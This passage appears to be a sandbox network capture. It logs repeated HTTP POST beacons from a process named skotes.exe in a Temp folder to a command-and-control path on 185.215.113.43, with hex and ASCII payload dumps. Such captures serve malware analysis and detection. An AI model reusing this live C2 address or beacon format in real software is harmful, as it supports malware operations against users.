r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:13:23.554280043 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:13:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	50070	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:13:25.295483112 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:13:26.627410889 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:13:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	50073	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:13:28.263384104 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:13:29.654611111 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:13:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	50075	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:13:31.415364981 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:13:32.802968979 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:13:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	50077	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:13:34.430207014 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:13:35.911736965 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:13:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	50079	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:13:37.657495975 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:13:39.048274040 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:13:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	50081	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:13:40.685340881 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:13:42.081556082 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:13:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	50082	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:13:43.813352108 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:13:45.190100908 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:13:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	50083	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:13:46.828730106 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:13:48.176667929 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:13:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	50085	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:13:49.953932047 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:13:51.315826893 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:13:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	50087	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:13:52.953731060 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:13:54.389008045 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:13:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50090	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:13:56.141918898 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:13:57.583847046 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:13:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50092	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:13:59.220616102 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:14:00.610451937 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:14:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50094	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:14:02.358969927 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:14:03.745052099 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:14:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50096	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:14:05.378355026 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:14:06.770081997 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:14:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50098	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:14:08.515795946 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:14:09.905498981 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:14:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50101	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:14:11.546442032 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:14:12.929306984 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:14:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50103	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:14:14.671928883 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:14:16.095777988 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:14:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50105	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:14:17.734579086 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:14:19.123548985 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:14:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Nov 21, 2024 22:16:36.131922007 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:16:37.520129919 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:16:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50108	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:14:20.875996113 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:14:22.218266964 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:14:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Nov 21, 2024 22:16:45.289169073 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:16:46.717390060 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:16:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50110	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:14:23.843540907 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:14:25.291801929 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:14:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	50112	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:14:27.055140972 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:14:28.474555016 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:14:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Nov 21, 2024 22:16:54.617069006 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:16:56.003976107 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:16:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
